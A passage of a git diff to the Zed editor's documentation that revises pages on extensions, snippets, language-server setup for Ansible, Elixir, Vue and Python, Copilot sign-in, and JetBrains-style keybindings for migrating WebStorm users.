slash command will be run when the completion is accepted. - -Once again, your extension should `match` on the command name (without the leading `/`) and return the desired argument completions: - -```rs -impl zed::Extension for MyExtension { - fn complete_slash_command_argument( - &self, - command: SlashCommand, - _args: Vec, - ) -> Result, String> { - match command.name.as_str() { - "echo" => Ok(vec![]), - "pick-one" => Ok(vec![ - SlashCommandArgumentCompletion { - label: "Option One".to_string(), - new_text: "option-1".to_string(), - run_command: true, - }, - SlashCommandArgumentCompletion { - label: "Option Two".to_string(), - new_text: "option-2".to_string(), - run_command: true, - }, - SlashCommandArgumentCompletion { - label: "Option Three".to_string(), - new_text: "option-3".to_string(), - run_command: true, - }, - ]), - command => Err(format!("unknown slash command: \"{command}\"")), - } - } -} -``` +To extend the Agent Panel with custom tools and context, use [MCP Servers](./mcp-extensions.md) instead. diff --git a/docs/src/extensions/snippets.md b/docs/src/extensions/snippets.md new file mode 100644 index 0000000000000000000000000000000000000000..1fa83b07b78403346608494b3932b58e37f8688e --- /dev/null +++ b/docs/src/extensions/snippets.md @@ -0,0 +1,27 @@ +--- +title: Snippets +description: "Snippets for Zed extensions." +--- + +# Snippets + +Extensions may provide snippets for one or more languages. + +Each file containing snippets can be specified in the `snippets` field of the `extensions.toml` file. + +The referenced path must be relative to the `extension.toml`. + +## Defining Snippets + +A given extension may provide one or more snippets. Each snippet must be registered in the `extension.toml`. + +Zed matches snippet files based on the lowercase name of the language (e.g. `rust.json` for Rust). +You can use `snippets.json` as a file name to define snippets that will be available regardless of the current buffer language. + +For example, here is an extension that provides snippets for Rust and TypeScript: + +```toml +snippets = ["./snippets/rust.json", "./snippets/typescript.json"] +``` + +For more information on how to create snippets, see the [Snippets documentation](../snippets.md). diff --git a/docs/src/finding-navigating.md b/docs/src/finding-navigating.md index f1d3536f8c909f18240f83eac6f4309159b764e1..af30b0ee71554012c2292092f4d7694784ff14cd 100644 --- a/docs/src/finding-navigating.md +++ b/docs/src/finding-navigating.md @@ -23,14 +23,6 @@ Search across all files with {#kb pane::DeploySearch}. Start typing in the searc Results appear in a [multibuffer](./multibuffers.md), letting you edit matches in place. -To disable automatic search and require pressing Enter instead, open the Settings Editor ({#kb zed::OpenSettings}), search for "search on input", and toggle the setting off. Or add this to your settings.json: - -```json -{ - "search_on_input": false -} -``` - ## Go to Definition Jump to where a symbol is defined with {#kb editor::GoToDefinition} (or `Cmd+Click` / `Ctrl+Click`). If there are multiple definitions, they open in a multibuffer. diff --git a/docs/src/getting-started.md b/docs/src/getting-started.md index af6a41c26a6f70f073b2d7e45267871962bb1697..a87e1bea0f4c3eacaa330b34874283a0b61b5eb9 100644 --- a/docs/src/getting-started.md +++ b/docs/src/getting-started.md @@ -13,8 +13,6 @@ This guide covers the essential commands, environment setup, and navigation basi ### Welcome Page -> **Changed in Preview (v0.225).** See [release notes](/releases#0.225). - When you open Zed without a folder, you see the welcome page in the main editor area. The welcome page offers quick actions to open a folder, clone a repository, or view documentation. Once you open a folder or file, the welcome page disappears. If you split the editor into multiple panes, the welcome page appears only in the center pane when empty—other panes show a standard empty state. To reopen the welcome page, close all items in the center pane or use the command palette to search for "Welcome". diff --git a/docs/src/git.md b/docs/src/git.md index b33aa0690cbad99f792729dd780ab03716d0dc4c..f7b524925195a80af05387ad1b063ceccff66436 100644 --- a/docs/src/git.md +++ b/docs/src/git.md @@ -99,11 +99,11 @@ You can switch between modes at any time. Your preference applies to [Project Di File History shows the commit history for an individual file. Each entry displays the commit's author, timestamp, and message. Selecting a commit opens a diff view filtered to show only the changes made to that file in that commit. -To open File History: +To view File History: -- Right-click on a file in the Project Panel and select "Open File History" -- Right-click on a file in the Git Panel and select "Open File History" -- Right-click on an editor tab and select "Open File History" +- Right-click on a file in the Project Panel and select "View File History" +- Right-click on a file in the Git Panel and select "View File History" +- Right-click on an editor tab and select "View File History" - Use the Command Palette and search for "file history" ## Fetch, Push, and Pull diff --git a/docs/src/languages/ansible.md b/docs/src/languages/ansible.md index 99980a1a1642717d8306cf8d98ce81be33326207..fd595bc7e3391ab95d90c3d4e34742e6a8bd7c1f 100644 --- a/docs/src/languages/ansible.md +++ b/docs/src/languages/ansible.md @@ -14,10 +14,13 @@ Support for Ansible in Zed is provided via a community-maintained [Ansible exten ### File detection -To avoid mishandling non-Ansible YAML files, the Ansible Language is not associated with any file extensions by default. To change this behavior you can add a `"file_types"` section to Zed settings inside your project (`.zed/settings.json`) or your Zed user settings (`~/.config/zed/settings.json`) to match your folder/naming conventions. For example: +To avoid mishandling non-Ansible YAML files, the Ansible Language is not associated with any file extensions by default. + +To change this behavior, you can add a `"file_types"` section to Zed settings inside your project (`.zed/settings.json`) or your Zed user settings (`~/.config/zed/settings.json`) to match your folder/naming conventions. For example: ```json [settings] -"file_types": { +{ + "file_types": { "Ansible": [ "**.ansible.yml", "**.ansible.yaml", @@ -39,6 +42,7 @@ To avoid mishandling non-Ansible YAML files, the Ansible Language is not associa "**playbook*.yaml" ] } +} ``` Feel free to modify this list as per your needs. @@ -47,34 +51,36 @@ Feel free to modify this list as per your needs. If your inventory file is in the YAML format, you can either: -- Append the `ansible-lint` inventory json schema to it via the following comment at the top of your inventory file: +- Append the `ansible-lint` inventory JSON schema to it via the following comment at the top of your inventory file: ```yml # yaml-language-server: $schema=https://raw.githubusercontent.com/ansible/ansible-lint/main/src/ansiblelint/schemas/inventory.json ``` -- Or configure the yaml language server settings to set this schema for all your inventory files, that match your inventory pattern, under your Zed settings ([ref](https://zed.dev/docs/languages/yaml)): +- or, configure the YAML language server settings to set this schema for all your inventory files, that match your inventory pattern, under your Zed settings ([ref](https://zed.dev/docs/languages/yaml)): ```json [settings] -"lsp": { +{ + "lsp": { "yaml-language-server": { "settings": { "yaml": { "schemas": { "https://raw.githubusercontent.com/ansible/ansible-lint/main/src/ansiblelint/schemas/inventory.json": [ "./inventory/*.yaml", - "hosts.yml", + "hosts.yml" ] } } } } -}, + } +} ``` ### LSP Configuration -By default, the following default config is passed to the Ansible language server. It conveniently mirrors the defaults set by [nvim-lspconfig](https://github.com/neovim/nvim-lspconfig/blob/03bc581e05e81d33808b42b2d7e76d70adb3b595/lua/lspconfig/configs/ansiblels.lua) for the Ansible language server: +By default, the following configuration is passed to the Ansible language server. It conveniently mirrors the defaults set by [nvim-lspconfig](https://github.com/neovim/nvim-lspconfig/blob/03bc581e05e81d33808b42b2d7e76d70adb3b595/lua/lspconfig/configs/ansiblels.lua) for the Ansible language server: ```json { @@ -99,31 +105,32 @@ By default, the following default config is passed to the Ansible language serve } ``` -> [!NOTE] -> In order for linting to work, ensure that `ansible-lint` is installed and discoverable on your PATH +> **Note:** In order for linting to work, ensure that `ansible-lint` is installed and discoverable on your `$PATH`. When desired, any of the above default settings can be overridden under the `"lsp"` section of your Zed settings file. For example: ```json [settings] -"lsp": { - // Note, the Zed Ansible extension prefixes all settings with `ansible` - // so instead of using `ansible.ansible.path` use `ansible.path`. - "ansible-language-server": { - "settings": { - "ansible": { - "path": "ansible" - }, - "executionEnvironment": { - "enabled": false - }, - "python": { - "interpreterPath": "python3" - }, - "validation": { - "enabled": false, // disable validation - "lint": { - "enabled": false, // disable ansible-lint - "path": "ansible-lint" +{ + "lsp": { + // The Zed Ansible extension prefixes all settings with `ansible` + // so use `ansible.path` instead of `ansible.ansible.path`. + "ansible-language-server": { + "settings": { + "ansible": { + "path": "ansible" + }, + "executionEnvironment": { + "enabled": false + }, + "python": { + "interpreterPath": "python3" + }, + "validation": { + "enabled": false, + "lint": { + "enabled": false, + "path": "ansible-lint" + } } } } @@ -131,5 +138,4 @@ When desired, any of the above default settings can be overridden under the `"ls } ``` -A full list of options/settings, that can be passed to the server, can be found at the project's page [here](https://github.com/ansible/vscode-ansible/blob/5a89836d66d470fb9d20e7ea8aa2af96f12f61fb/docs/als/settings.md). -Feel free to modify option values as needed. +A full list of options/settings that can be passed to the server can be found at the project's page [here](https://github.com/ansible/vscode-ansible/blob/main/docs/als/settings.md). diff --git a/docs/src/languages/elixir.md b/docs/src/languages/elixir.md index e046e5bb0d31b8dcc8b50b32cf876cd1eb11069f..6724ef177900bab07ee4a07ccb0969e401ae5d18 100644 --- a/docs/src/languages/elixir.md +++ b/docs/src/languages/elixir.md @@ -7,94 +7,188 @@ description: "Configure Elixir language support in Zed, including language serve Elixir support is available through the [Elixir extension](https://github.com/zed-extensions/elixir). -- Tree-sitter: +- Tree-sitter Grammars: - [elixir-lang/tree-sitter-elixir](https://github.com/elixir-lang/tree-sitter-elixir) - [phoenixframework/tree-sitter-heex](https://github.com/phoenixframework/tree-sitter-heex) -- Language servers: +- Language Servers: - [elixir-lang/expert](https://github.com/elixir-lang/expert) - [elixir-lsp/elixir-ls](https://github.com/elixir-lsp/elixir-ls) - [elixir-tools/next-ls](https://github.com/elixir-tools/next-ls) - [lexical-lsp/lexical](https://github.com/lexical-lsp/lexical) -## Choosing a language server +Furthermore, the extension provides support for [EEx](https://hexdocs.pm/eex/EEx.html) (Embedded Elixir) templates and [HEEx](https://hexdocs.pm/phoenix/components.html#heex) templates, a mix of HTML and EEx used by Phoenix LiveView applications. -The Elixir extension offers language server support for `expert`, `elixir-ls`, `next-ls`, and `lexical`. +## Language Servers -`elixir-ls` is enabled by default. +The Elixir extension offers language server support for ElixirLS, Expert, Next LS, and Lexical. By default, only ElixirLS is enabled. You can change or disable the enabled language servers in your settings ({#kb zed::OpenSettings}) under Languages > Elixir/EEx/HEEx or directly within your settings file. -### Expert +Some of the language servers can also accept initialization or workspace configuration options. See the sections below for an outline of what each server supports. The configuration can be passed in your settings file via `lsp.{language-server-id}.initialization_options` and `lsp.{language-server-id}.settings` respectively. -Configure language servers in Settings ({#kb zed::OpenSettings}) under Languages > Elixir, or add to your settings file: +Visit the [Configuring Zed](../configuring-zed.md#settings-files) guide for more information on how to edit your settings file. + +### Using ElixirLS + +ElixirLS can accept workspace configuration options. + +The following example disables [Dialyzer](https://github.com/elixir-lsp/elixir-ls#dialyzer-integration): + +```json [settings] + "lsp": { + "elixir-ls": { + "settings": { + "dialyzerEnabled": false + } + } + } +``` + +See the official list of [ElixirLS configuration settings](https://github.com/elixir-lsp/elixir-ls#elixirls-configuration-settings) for all available options. + +### Using Expert + +Enable Expert by adding the following to your settings file: ```json [settings] "languages": { "Elixir": { "language_servers": ["expert", "!elixir-ls", "!next-ls", "!lexical", "..."] }, - "HEEX": { + "EEx": { + "language_servers": ["expert", "!elixir-ls", "!next-ls", "!lexical", "..."] + }, + "HEEx": { "language_servers": ["expert", "!elixir-ls", "!next-ls", "!lexical", "..."] } } ``` -### Next LS +Expert can accept workspace configuration options. + +The following example sets the minimum number of characters required for a project symbol search to return results: + +```json [settings] + "lsp": { + "expert": { + "settings": { + "workspaceSymbols": { + "minQueryLength": 0 + } + } + } + } +``` + +See the [Expert configuration](https://expert-lsp.org/docs/configuration/) page for all available options. + +To use a custom Expert build, add the following to your settings file: + +```json [settings] + "lsp": { + "expert": { + "binary": { + "path": "/path/to/expert", + "arguments": ["--stdio"] + } + } + } +``` + +### Using Next LS -Configure language servers in Settings ({#kb zed::OpenSettings}) under Languages > Elixir, or add to your settings file: +Enable Next LS by adding the following to your settings file: ```json [settings] "languages": { "Elixir": { "language_servers": ["next-ls", "!expert", "!elixir-ls", "!lexical", "..."] }, - "HEEX": { + "EEx": { + "language_servers": ["next-ls", "!expert", "!elixir-ls", "!lexical", "..."] + }, + "HEEx": { "language_servers": ["next-ls", "!expert", "!elixir-ls", "!lexical", "..."] } } ``` -### Lexical +Next LS can accept initialization options. -Configure language servers in Settings ({#kb zed::OpenSettings}) under Languages > Elixir, or add to your settings file: +Completions are an experimental feature within Next LS, they are enabled by default in Zed. Disable them by adding the following to your settings file: ```json [settings] - "languages": { - "Elixir": { - "language_servers": ["lexical", "!expert", "!elixir-ls", "!next-ls", "..."] - }, - "HEEX": { - "language_servers": ["lexical", "!expert", "!elixir-ls", "!next-ls", "..."] + "lsp": { + "next-ls": { + "initialization_options": { + "experimental": { + "completions": { + "enable": false + } + } + } } } ``` -## Setting up `elixir-ls` - -1. Install `elixir`: +Next LS also has an extension for [Credo](https://hexdocs.pm/credo/overview.html) integration which is enabled by default. You can disable this by adding the following section to your settings file: -```sh -brew install elixir +```json [settings] + "lsp": { + "next-ls": { + "initialization_options": { + "extensions": { + "credo": { + "enable": false + } + } + } + } + } ``` -2. Install `elixir-ls`: +Next LS can also pass CLI options directly to Credo. The following example passes `--min-priority high` to it: -```sh -brew install elixir-ls +```json [settings] + "lsp": { + "next-ls": { + "initialization_options": { + "extensions": { + "credo": { + "cli_options": ["--min-priority high"] + } + } + } + } + } ``` -3. Restart Zed +See the [Credo Command Line Switches](https://hexdocs.pm/credo/suggest_command.html#command-line-switches) page for more CLI options. -> If `elixir-ls` is not running in an elixir project, check the error log via the command palette action `zed: open log`. If you find an error message mentioning: `invalid LSP message header "Shall I install Hex? (if running non-interactively, use \"mix local.hex --force\") [Yn]`, you might need to install [`Hex`](https://hex.pm). You run `elixir-ls` from the command line and accept the prompt to install `Hex`. +### Using Lexical -### Formatting with Mix +Enable Lexical by adding the following to your settings file: -If you prefer to format your code with [Mix](https://hexdocs.pm/mix/Mix.html), configure it as an external formatter. Formatting will occur on file save. +```json [settings] + "languages": { + "Elixir": { + "language_servers": ["lexical", "!expert", "!elixir-ls", "!next-ls", "..."] + }, + "EEx": { + "language_servers": ["lexical", "!expert", "!elixir-ls", "!next-ls", "..."] + }, + "HEEx": { + "language_servers": ["lexical", "!expert", "!elixir-ls", "!next-ls", "..."] + } + } +``` + +## Formatting without a language server -Configure formatting in Settings ({#kb zed::OpenSettings}) under Languages > Elixir, or add to your settings file: +If you prefer to work without a language server but would still like code formatting from [Mix](https://hexdocs.pm/mix/Mix.html), you can configure it as an external formatter by adding the following to your settings file: ```json [settings] -{ "languages": { "Elixir": { + "enable_language_server": false, "format_on_save": "on", "formatter": { "external": { @@ -102,46 +196,41 @@ Configure formatting in Settings ({#kb zed::OpenSettings}) under Languages > Eli "arguments": ["format", "--stdin-filename", "{buffer_path}", "-"] } } - } - } -} -``` - -### Additional workspace configuration options - -You can pass additional elixir-ls workspace configuration options via `lsp` settings in your settings file ([how to edit](../configuring-zed.md#settings-files)). - -The following example disables dialyzer: - -```json [settings] - "lsp": { - "elixir-ls": { - "settings": { - "dialyzerEnabled": false + }, + "EEx": { + "enable_language_server": false, + "format_on_save": "on", + "formatter": { + "external": { + "command": "mix", + "arguments": ["format", "--stdin-filename", "{buffer_path}", "-"] + } + } + }, + "HEEx": { + "enable_language_server": false, + "format_on_save": "on", + "formatter": { + "external": { + "command": "mix", + "arguments": ["format", "--stdin-filename", "{buffer_path}", "-"] + } } } } ``` -See [ElixirLS configuration settings](https://github.com/elixir-lsp/elixir-ls#elixirls-configuration-settings) for more options. +## Using the Tailwind CSS Language Server with HEEx templates -### HEEx - -Zed also supports HEEx templates. HEEx is a mix of [EEx](https://hexdocs.pm/eex/1.12.3/EEx.html) (Embedded Elixir) and HTML, and is used in Phoenix LiveView applications. - -- Tree-sitter: [phoenixframework/tree-sitter-heex](https://github.com/phoenixframework/tree-sitter-heex) - -#### Using the Tailwind CSS Language Server with HEEx - -To get all features (autocomplete, linting, and hover docs) from the [Tailwind CSS language server](https://github.com/tailwindlabs/tailwindcss-intellisense/tree/HEAD/packages/tailwindcss-language-server#readme) in HEEx files, add the following to your settings file ([how to edit](../configuring-zed.md#settings-files)): +To get all features (autocomplete, linting, and hover docs) from the [Tailwind CSS language server](https://github.com/tailwindlabs/tailwindcss-intellisense/tree/HEAD/packages/tailwindcss-language-server#readme) in HEEx templates, add the following to your settings file: ```json [settings] -{ "lsp": { "tailwindcss-language-server": { "settings": { "includeLanguages": { - "phoenix-heex": "html" + "elixir": "html", + "heex": "html" }, "experimental": { "classRegex": ["class=\"([^\"]*)\"", "class='([^']*)'"] @@ -149,10 +238,9 @@ To get all features (autocomplete, linting, and hover docs) from the [Tailwind C } } } -} ``` -With these settings, you will get completions for Tailwind CSS classes in HEEx template files. Examples: +With these settings, you will get completions for Tailwind CSS classes in HEEx templates. Examples: ```heex <%!-- Standard class attribute --%> @@ -170,3 +258,8 @@ With these settings, you will get completions for Tailwind CSS classes in HEEx t Content
``` + +## See also + +- [Erlang](./erlang.md) +- [Gleam](./gleam.md) diff --git a/docs/src/languages/python.md b/docs/src/languages/python.md index d66f52c71cb9295fe9ca94e5890de48cd1275e57..0f34fdb752143b30eb1f42a836482bd4ea1d1188 100644 --- a/docs/src/languages/python.md +++ b/docs/src/languages/python.md @@ -89,8 +89,8 @@ Configure language servers in Settings ({#kb zed::OpenSettings}) under Languages "languages": { "Python": { "language_servers": [ - // Disable basedpyright and enable ty, and otherwise - // use the default configuration. + // Enable ty, disable basedpyright, and enable all + // other registered language servers (ruff, pylsp, pyright). "ty", "!basedpyright", "..." diff --git a/docs/src/languages/tailwindcss.md b/docs/src/languages/tailwindcss.md index db0eb1b4d255474ed671ab16ba9f6d235372efa6..e461aa2d7fa53d2e2d19e0af985a4830e8f477d1 100644 --- a/docs/src/languages/tailwindcss.md +++ b/docs/src/languages/tailwindcss.md @@ -15,7 +15,7 @@ Languages which can be used with Tailwind CSS in Zed: - [CSS](./css.md) - [ERB](./ruby.md#using-the-tailwind-css-language-server-with-ruby) - [Gleam](./gleam.md) -- [HEEx](./elixir.md#using-the-tailwind-css-language-server-with-heex) +- [HEEx](./elixir.md#using-the-tailwind-css-language-server-with-heex-templates) - [HTML](./html.md#using-the-tailwind-css-language-server-with-html) - [TypeScript](./typescript.md#using-the-tailwind-css-language-server-with-typescript) - [JavaScript](./javascript.md#using-the-tailwind-css-language-server-with-javascript) diff --git a/docs/src/languages/vue.md b/docs/src/languages/vue.md index 607d2b18a5243a5b552db96308faab6aebeb8b6c..3c2336119dfceb4aeea226bb2ccc2484dd438cbc 100644 --- a/docs/src/languages/vue.md +++ b/docs/src/languages/vue.md @@ -8,7 +8,59 @@ description: "Configure Vue language support in Zed, including language servers, Vue support is available through the [Vue extension](https://github.com/zed-extensions/vue). - Tree-sitter: [tree-sitter-grammars/tree-sitter-vue](https://github.com/tree-sitter-grammars/tree-sitter-vue) -- Language Server: [vuejs/language-tools/](https://github.com/vuejs/language-tools/) +- Language Server: [vuejs/language-tools](https://github.com/vuejs/language-tools) + +## Initialization Options + +### Specifying location of TypeScript SDK + +By default, this extension assumes that you are working in a project with a `node_modules` directory, and searches for +the TypeScript SDK inside that directory. + +This may not always be true; for example, when working in a project that uses Yarn PnP, there is no `node_modules`. For +editor support, the [documented](https://yarnpkg.com/getting-started/editor-sdks) approach is to run something like +`yarn dlx @yarnpkg/sdks`. In that case, you can provide the following initialization options in your Zed settings: + +```json +{ + "lsp": { + "vue": { + "initialization_options": { + "typescript": { + "tsdk": ".yarn/sdks/typescript/lib" + } + } + } + } +} +``` + +## Settings Options + +`lsp.vue.settings` is passed through to the Vue language server (Volar / [`vuejs/language-tools`](https://github.com/vuejs/language-tools)). The following settings are enabled by default: + +```json +{ + "lsp": { + "vue": { + "settings": { + // Display inlay hints for the `$event` parameter in inline event handlers. + "vue.inlayHints.inlineHandlerLeading": true, + // Display hints when required component props are missing in templates. + "vue.inlayHints.missingProps": true, + // Display inlay hints for patterns that wrap component options. + "vue.inlayHints.optionsWrapper": true, + // Display inlay hints related to `v-bind` shorthand (`:`). + "vue.inlayHints.vBindShorthand": true + } + } + } +} +``` + +You can find the upstream settings configuration schema [`here`](https://github.com/vuejs/language-tools/blob/ee5041d27940cf6f9a5150635d3b13140a9dff54/extensions/vscode/package.json#L252). + +> Note: Some settings (e.g. `vue.editor.focusMode`) may not take effect. ## Using the Tailwind CSS Language Server with Vue diff --git a/docs/src/migrate/intellij.md b/docs/src/migrate/intellij.md index bb10c8cdc3b9002e0aeb9a362a0a945de6f46176..adf0e20bef761385b66ad6bf55e387dd662088f4 100644 --- a/docs/src/migrate/intellij.md +++ b/docs/src/migrate/intellij.md @@ -261,7 +261,6 @@ Zed's extension catalog is smaller and more focused: - Language support and syntax highlighting - Themes -- Slash commands for AI - Context servers Several features that require plugins in other editors are built into Zed: diff --git a/docs/src/migrate/pycharm.md b/docs/src/migrate/pycharm.md index 6bef34f81cb380690764742a7b0310cbc81f2072..0ce769b06bcc1363a4dde1d9ae3c138c0b4539f1 100644 --- a/docs/src/migrate/pycharm.md +++ b/docs/src/migrate/pycharm.md @@ -319,7 +319,6 @@ Zed's extension catalog is smaller and more focused: - Language support and syntax highlighting - Themes -- Slash commands for AI - Context servers Several features that require plugins in PyCharm are built into Zed: diff --git a/docs/src/migrate/rustrover.md b/docs/src/migrate/rustrover.md index 5dc2ab10e9e3f70cd34f2582e3a2a39608168ed8..1e12202233ff1dc8f958b7acfc71a16723ed34ff 100644 --- a/docs/src/migrate/rustrover.md +++ b/docs/src/migrate/rustrover.md @@ -315,7 +315,6 @@ Zed's extension catalog is smaller and more focused: - Language support and syntax highlighting - Themes -- Slash commands for AI - Context servers Several features that might require plugins in other editors are built into Zed: diff --git a/docs/src/migrate/vs-code.md b/docs/src/migrate/vs-code.md index 367cab469acb1969909457edecba8a10c633bfc4..820158c73ffc1ec2f869ad88e34fea4697e4fbec 100644 --- a/docs/src/migrate/vs-code.md +++ b/docs/src/migrate/vs-code.md @@ -317,18 +317,12 @@ If you’re used to GitHub Copilot in VS Code, you can do the same in Zed. You c #### Configuring GitHub Copilot -You should be able to sign-in to GitHub Copilot by clicking on the Zeta icon in the status bar and following the setup instructions. -You can also add this to your settings: +1. Open Settings with `Cmd+,` (macOS) or `Ctrl+,` (Linux/Windows) +2. Navigate to **AI → Edit Predictions** +3. Click **Configure** next to "Configure Providers" +4. Under **GitHub Copilot**, click **Sign in to GitHub** -```json -{ - "features": { - "edit_prediction_provider": "copilot" - } -} -``` - -To invoke completions, just start typing. Zed will offer suggestions inline for you to accept. +Once signed in, just start typing. Zed will offer suggestions inline for you to accept. #### Additional AI Options diff --git a/docs/src/migrate/webstorm.md b/docs/src/migrate/webstorm.md index 72916b04c5579785d2f099f1fd2b09d7ffb11acf..3708d8dec825caf23b831a4151ee60e95c04287d 100644 --- a/docs/src/migrate/webstorm.md +++ b/docs/src/migrate/webstorm.md @@ -37,11 +37,11 @@ This opens the current directory in Zed. If you're coming from WebStorm, the fastest way to feel at home is to use the JetBrains keymap. During onboarding, you can select it as your base keymap. If you missed that step, you can change it anytime: -1. Open Settings with `Cmd+,` (macOS) or `Ctrl+,` (Linux/Windows) +1. Open Settings with {#kb zed::OpenSettings} 2. Search for `Base Keymap` 3. Select `JetBrains` -This maps familiar shortcuts like `Shift Shift` for Search Everywhere, `Cmd+O` for Go to Class, and `Cmd+Shift+A` for Find Action. +This maps familiar shortcuts like {#kb:jetbrains project_symbols::Toggle} for Go to Class and {#kb:jetbrains command_palette::Toggle} for Find Action. ## Set Up Editor Preferences @@ -63,7 +63,7 @@ Zed also supports per-project settings. Create a `.zed/settings.json` file in yo ## Open or Create a Project -After setup, press `Cmd+Shift+O` (with JetBrains keymap) to open a folder. This becomes your workspace in Zed. Unlike WebStorm, there's no project configuration wizard, no framework selection dialog, and no project structure setup required. +After setup, use {#kb:jetbrains file_finder::Toggle} to open a folder. This becomes your workspace in Zed. Unlike WebStorm, there's no project configuration wizard, no framework selection dialog, and no project structure setup required. To start a new project, create a directory using your terminal or file manager, then open it in Zed. The editor will treat that folder as the root of your project. For new projects, you'd typically run `npm init`, `pnpm create`, or your framework's CLI tool first, then open the resulting folder in Zed. @@ -72,60 +72,53 @@ You can also launch Zed from the terminal inside any folder with: Once inside a project: -- Use `Cmd+Shift+O` or `Cmd+E` to jump between files quickly (like WebStorm's "Recent Files") -- Use `Cmd+Shift+A` or `Shift Shift` to open the Command Palette (like WebStorm's "Search Everywhere") -- Use `Cmd+O` to search for symbols (like WebStorm's "Go to Symbol") +- Use {#kb:jetbrains file_finder::Toggle} to jump between files quickly (like WebStorm's "Recent Files") +- Use {#kb:jetbrains command_palette::Toggle} to open the Command Palette (like WebStorm's "Search Everywhere") +- Use {#kb:jetbrains project_symbols::Toggle} to search for symbols (like WebStorm's "Go to Symbol") -Open buffers appear as tabs across the top. The Project Panel shows your file tree and Git status. Toggle it with `Cmd+1` (just like WebStorm's Project tool window). +Open buffers appear as tabs across the top. The Project Panel shows your file tree and Git status. Toggle it with {#kb:jetbrains project_panel::ToggleFocus} (just like WebStorm's Project tool window). ## Differences in Keybindings -If you chose the JetBrains keymap during onboarding, most of your shortcuts should already feel familiar. Here's a quick reference for how Zed compares to WebStorm. - -### Common Shared Keybindings - -| Action | Shortcut | -| ----------------------------- | ----------------------- | -| Search Everywhere | `Shift Shift` | -| Find Action / Command Palette | `Cmd + Shift + A` | -| Go to File | `Cmd + Shift + O` | -| Go to Symbol | `Cmd + O` | -| Recent Files | `Cmd + E` | -| Go to Definition | `Cmd + B` | -| Find Usages | `Alt + F7` | -| Rename Symbol | `Shift + F6` | -| Reformat Code | `Cmd + Alt + L` | -| Toggle Project Panel | `Cmd + 1` | -| Toggle Terminal | `Alt + F12` | -| Duplicate Line | `Cmd + D` | -| Delete Line | `Cmd + Backspace` | -| Move Line Up/Down | `Shift + Alt + Up/Down` | -| Expand/Shrink Selection | `Alt + Up/Down` | -| Comment Line | `Cmd + /` | -| Go Back / Forward | `Cmd + [` / `Cmd + ]` | -| Toggle Breakpoint | `Ctrl + F8` | - -### Different Keybindings (WebStorm → Zed) - -| Action | WebStorm | Zed (JetBrains keymap) | -| ---------------------- | ----------- | ------------------------ | -| File Structure | `Cmd + F12` | `Cmd + F12` (outline) | -| Navigate to Next Error | `F2` | `F2` | -| Run | `Ctrl + R` | `Ctrl + Alt + R` (tasks) | -| Debug | `Ctrl + D` | `Alt + Shift + F9` | -| Stop | `Cmd + F2` | `Ctrl + F2` | +If you chose the JetBrains keymap during onboarding, most of your shortcuts should already feel familiar. Here's a quick reference of common actions and their keybindings with the JetBrains keymap active. + +### Common Keybindings + +| Action | Zed Keybinding | +| ---------------------- | ----------------------------------------------- | +| Command Palette | {#kb:jetbrains command_palette::Toggle} | +| Go to File | {#kb:jetbrains file_finder::Toggle} | +| Go to Symbol | {#kb:jetbrains project_symbols::Toggle} | +| File Outline | {#kb:jetbrains outline::Toggle} | +| Go to Definition | {#kb:jetbrains editor::GoToDefinition} | +| Find Usages | {#kb:jetbrains editor::FindAllReferences} | +| Rename Symbol | {#kb:jetbrains editor::Rename} | +| Reformat Code | {#kb:jetbrains editor::Format} | +| Toggle Project Panel | {#kb:jetbrains project_panel::ToggleFocus} | +| Toggle Terminal | {#kb:jetbrains terminal_panel::Toggle} | +| Duplicate Line | {#kb:jetbrains editor::DuplicateSelection} | +| Delete Line | {#kb:jetbrains editor::DeleteLine} | +| Move Line Up | {#kb:jetbrains editor::MoveLineUp} | +| Move Line Down | {#kb:jetbrains editor::MoveLineDown} | +| Expand Selection | {#kb:jetbrains editor::SelectLargerSyntaxNode} | +| Shrink Selection | {#kb:jetbrains editor::SelectSmallerSyntaxNode} | +| Comment Line | {#kb:jetbrains editor::ToggleComments} | +| Go Back | {#kb:jetbrains pane::GoBack} | +| Go Forward | {#kb:jetbrains pane::GoForward} | +| Toggle Breakpoint | {#kb:jetbrains editor::ToggleBreakpoint} | +| Navigate to Next Error | {#kb:jetbrains editor::GoToDiagnostic} | ### Unique to Zed -| Action | Shortcut | Notes | -| ----------------- | -------------------------- | ------------------------------ | -| Toggle Right Dock | `Cmd + R` | Assistant panel, notifications | -| Split Panes | `Cmd + K`, then arrow keys | Create splits in any direction | +| Action | Keybinding | Notes | +| ----------------- | -------------------------------- | ------------------------------------------------------------- | +| Toggle Right Dock | {#kb workspace::ToggleRightDock} | Assistant panel, notifications | +| Split Pane Right | {#kb pane::SplitRight} | Use other arrow keys to create splits in different directions | ### How to Customize Keybindings -- Open the Command Palette (`Cmd+Shift+A` or `Shift Shift`) -- Run `Zed: Open Keymap Editor` +- Open the Command Palette ({#kb:jetbrains command_palette::Toggle}) +- Run `zed: open keymap` This opens a list of all available bindings. You can override individual shortcuts or remove conflicts. @@ -143,9 +136,9 @@ WebStorm's index enables features like finding all usages across your entire cod **How to adapt:** -- Search symbols across the project with `Cmd+O` (powered by the TypeScript language server) -- Find files by name with `Cmd+Shift+O` -- Use `Cmd+Shift+F` for text search—it stays fast even in large monorepos +- Search symbols across the project with {#kb:jetbrains project_symbols::Toggle} (powered by the TypeScript language server) +- Find files by name with {#kb:jetbrains file_finder::Toggle} +- Use {#kb pane::DeploySearch} for text search—it stays fast even in large monorepos - Run `tsc --noEmit` or `eslint .` from the terminal when you need deeper project-wide analysis ### LSP vs. Native Language Intelligence @@ -169,10 +162,10 @@ Where you might notice differences: **How to adapt:** -- Use `Alt+Enter` for available code actions—the list will vary by language server +- Use {#kb:jetbrains editor::ToggleCodeActions} for available code actions—the list will vary by language server - Ensure your `tsconfig.json` is properly configured so the language server understands your project structure - Use Prettier for consistent formatting (it's enabled by default for JS/TS) -- For code inspection similar to WebStorm's "Inspect Code," check the Diagnostics panel (`Cmd+6`)—ESLint and TypeScript together catch many of the same issues +- For code inspection similar to WebStorm's "Inspect Code," check the Diagnostics panel ({#kb:jetbrains diagnostics::Deploy})—ESLint and TypeScript together catch many of the same issues ### No Project Model @@ -212,8 +205,8 @@ What this means in practice: ] ``` -- Use `Ctrl+Alt+R` to run tasks quickly -- Lean on your terminal (`Alt+F12`) for anything tasks don't cover +- Use {#kb:jetbrains task::Spawn} to run tasks quickly +- Lean on your terminal ({#kb:jetbrains terminal_panel::Toggle}) for anything tasks don't cover ### No Framework Integration @@ -223,8 +216,8 @@ Zed has none of this built-in. The TypeScript language server sees your code as **How to adapt:** -- Use grep and file search liberally. `Cmd+Shift+F` with a regex can find component definitions, route configurations, or API endpoints. -- 